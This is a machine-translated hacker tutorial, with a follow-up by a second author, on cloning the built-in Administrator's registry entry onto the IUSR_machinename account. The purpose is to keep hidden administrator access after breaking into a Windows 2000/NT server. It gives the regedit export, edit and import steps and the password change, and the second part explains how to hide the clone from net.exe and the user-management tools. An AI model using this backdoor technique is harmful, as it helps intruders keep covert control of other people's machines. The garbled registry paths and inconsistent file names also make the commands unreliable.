Ways to Clone Administrator accounts

Often see some people in the invasion of a Windows 2000 or Windows NT after the audience to create an administrative group of users, it seems that when the administrator does not exist in general, today I violate my previous intention, share a similar to the rootkit, of course, These processes can also be scripted, but I don't write them, ok,show time now.

The first thing to know is that in Windows 2000 and Windows NT, the SID for the default administrator account is fixed (0X1F4), so we can clone the SID 500 account with an existing account in the machine. Here we choose the account number is IUSR_machinename (of course, in order to enhance the concealment, we chose this account, all users can use the following methods, but this user is more common), the test environment for Windows Server.

Run a system cmd Shell (http://www.sometips.com/tips/scripts/173.htm or use Http://www.sometips.com/soft/psu.exe), and run it inside the cmd shell.
regedit/e Adam.reg HKEY_LOCAL_MACHINESAMSAMDOMAINSACCOUNTUSERSF4
So we export the information about the SID 500 admin account, then edit the Adam.reg file and adam.reg the third line of the file--[HKEY_LOCAL_MACHINESAMSAMDOMAINSACCOUNTUSERSF4] The final ' 1f4 ' is modified to the SID of the IUSR_machinename (most of the machines are 0x3e9 for the user, and if the machine does not have IIS installed when it was originally installed, it may not be the same value if you created the account and then installed IIS). After modifying ' 1f4 ' in the Root.reg file to ' 3E9 ', execute
REGEDIT/S Adam.reg
Import the Reg file

And then run
NET user IUSR_machinename Sometips
Modify IUSR_machinename password (preferably with a 14-bit password, more like IUSR_machinename password the better)

OK, it's done ...

In this way, we have the same desktop as the default administrator, the same profile ....
And, when we run. NET localgroup administrators, look at the results:
c:>net localgroup Administrators
Alias Name Administrators
Comment Administrators have complete and unrestricted access to the Computer/domain

Members

-------------------------------------------------------------------------------
Administrator
The command completed successfully.

And look at the output of User2sid:
C:>user2sid Administrator

s-1-5-21-1004336348-1078145449-854245398-500

Number of Subauthorities is 5
Domain is Idontknow
Length of SID in memory is bytes
Type of SID is Sidtypeuser

C:>user2sid IUSR_machinename

s-1-5-21-1004336348-1078145449-854245398-1001

Number of Subauthorities is 5
Domain is Idontknow
Length of SID in memory is bytes
Type of SID is Sidtypeuser

I think, no more clever administrator can not see any of the strange ... Moreover, any admin change into what password, I can still use IUSR_machinename, password for sometips landing ... (No hero-class administrator likes to change iusr_machinename for other names)

^_^, this is not rootkit ...

Report:
1, thank Ding Ding to pay the cost of reinstall OS ...
2, any use of the above methods caused by the system can not be used by the systems are not even, I do not provide technical support ...

-----------------------------------------------------------------------------

Ding Ding's complement perfect

Many people refer to the use of management tools of user management, to be able to discover IUSR_machinename was elevated privileges.
A solution is given.

Method Ditto, but this time the modification content is more. That
To export two key content this time:
Adam mentioned it.
regedit/e Adam.reg HKEY_LOCAL_MACHINESAMSAMDOMAINSACCOUNTUSERSF4
And then the other one is you need to change the value of that account.
regedit/e Iusr.reg Hkey_local_machinesamsamdomainsaccountuserse9

And then follow Adam's reference to the modification Adam.reg
"Modify the third line of the Adam.reg file--[HKEY_LOCAL_MACHINESAMSAMDOMAINSACCOUNTUSERSF4] The last ' 1f4 ' to the SID of IUSR_machinename"

Now, you're going to have to copy the contents from the Iusr.reg file.
is to copy the "' V ' =hex:0" from the Iusr.reg file to the end of the Iusr.reg file.
And then replace the parts of the same position in the Adam.reg.

Last use
REGEDIT/S Adam.reg
Import the Reg file
Oh, don't forget to change the password for this iusr_machinename.
Hehe,ok, it's done.
The IUSR_machinename account now has administrator privileges, but you use Net.exe and
User management in management tools will not see any traces, even if you look at the groups and users belonging to.
There is no difference before the modification.

Well, that's the end of the supplement.